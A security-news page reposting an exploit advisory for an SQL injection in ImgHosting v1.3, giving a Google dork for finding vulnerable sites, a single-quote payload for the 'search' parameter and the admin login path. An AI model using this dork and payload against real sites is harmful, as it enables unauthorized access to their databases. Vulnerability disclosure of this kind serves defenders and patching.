Exploit/Advisories

Published on September 7th, 2023 📆 | 4114 Views ⚑

0

ImgHosting 1.3 SQL Injection – Torchsec

====================================================================================================================================
| # Title : ImgHosting v1.3 Sql Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit) |
| # Vendor : https://codecanyon.net/user/FoxSash/?ref=FoxSash |
| # Dork : "ImgHosting Programming by FoxSash" |
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Use payload : ' in search box

[+] http://target_site/sowrkcom/?search=1' <==== inject here

[+] Login http://target_site/admin/

Greetings to :=========================================================================================================================
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |
=======================================================================================================================================

Tagged with: imghosting • injection • SQL • torchsec

Leave a Reply Cancel reply

🌟 Your Account

Username/Email Password
Remember Me
Register
🔔 Email Subscriptions

Get new posts by email
- Donate Via Wallets
  MetaMask
  
  Trust Wallet
  
  Binance Wallet
  
  WalletConnect
Feed

New Malware-as-a-Service Threat Emerges in the Cybercrime Underground
2 October 2023
Oct 02, 2023THNCyber Threat / Malware Cybersecurity experts have discovered yet another malware-as-a-service (MaaS) threat 🔎
Gentoo Linux Security Advisory 202309-15 – Torchsec
3 October 2023
– – – – – – – – – – – – – – – 🔎
Gentoo Linux Security Advisory 202309-11 – Torchsec
29 September 2023
– – – – – – – – – – – – – – – 🔎
Iranian APT Group OilRig Using New Menorah Malware for Covert Operations
30 September 2023
Sep 30, 2023THNCyber Espionage / Malware Sophisticated cyber actors backed by Iran known as OilRig 🔎
Risk of a US Government Shutdown Is Fueled by Very Online Republicans
30 September 2023
What “reality” means on the right largely depends on which social and media ecosystems one 🔎
Popular
- A New Cybercrime Group Linked to 7 Ransomware Families by Admin September 26, 2023 Cybersecurity experts have shed light on a new cybercrime group… (10)
- Mozilla: Your New Car Is a Data Privacy Nightmare by Admin September 13, 2023 Eighty-four percent of the brands that researchers studied share or… (8)
- GitHub Repositories Hit by Password-Stealing Commits… by Admin September 28, 2023 Sep 28, 2023THNSupply Chain / Malware A new malicious campaign… (7)
- Microsoft Error Reporting Local Privilege Elevation… by Admin September 27, 2023 ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule… (6)
Gloss
- beeg on New Report Uncovers Three Distinct Clusters of China-Nexus Attacks on Southeast Asian Government
- great 126rt on New Report Uncovers Three Distinct Clusters of China-Nexus Attacks on Southeast Asian Government
- More info on Alumni Club Management Tools 2.2.7 SQL Injection / Arbitrary File Upload – Torchsec
- Hyperbaric Oxygen เชียงใหม่ on Alumni Club Management Tools 2.2.7 SQL Injection / Arbitrary File Upload – Torchsec
- sga508 on Alumni Club Management Tools 2.2.7 SQL Injection / Arbitrary File Upload – Torchsec
- inpatient detox near me on Alumni Club Management Tools 2.2.7 SQL Injection / Arbitrary File Upload – Torchsec
- buy auto instagram followers on Alumni Club Management Tools 2.2.7 SQL Injection / Arbitrary File Upload – Torchsec
- Source URL on Alumni Club Management Tools 2.2.7 SQL Injection / Arbitrary File Upload – Torchsec
- Click here on Alumni Club Management Tools 2.2.7 SQL Injection / Arbitrary File Upload – Torchsec
- adding a wall to a finished basement on Alumni Club Management Tools 2.2.7 SQL Injection / Arbitrary File Upload – Torchsec
☕️Social Media

Torchsec

Tweets by Torch_sec
👥Members

Newest | Active | Popular
- Louie Hursey
  
  registered 3 days, 10 hours ago
- Michell Real
  
  registered 1 week, 2 days ago
- Maryjo Combes
  
  registered 1 week, 2 days ago
- Janina Midgette
  
  registered 2 weeks, 3 days ago
- Lola Reiter
  
  registered 2 weeks, 3 days ago
🌍 Forum Groups

Newest | Active | Popular | Alphabetical
- General Talk
  
  active 3 days, 10 hours ago
- Help Me !!
  
  active 3 days, 10 hours ago
- Comments & Suggestions
  
  active 3 days, 10 hours ago
- Ebooks – Papers
  
  active 3 days, 10 hours ago
- Embedded Systems, Electronics, Gadgets, and DIY
  
  active 3 days, 10 hours ago
linktr.ee/obewyn

We share and comment on interesting infosec related news, tools and more. Follow us on RSS ,Facebook or Twitter for the latest updates. Torchsec is designed to help Auditors, Pentesters & Security Experts to keep their ethical hacking oriented toolbox up-to-date .
This website is made for educational and ethical testing purposes only。It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this website.

Archives

© Torchsec Privacy Policy Disclaimer T&C

Back to Top ↑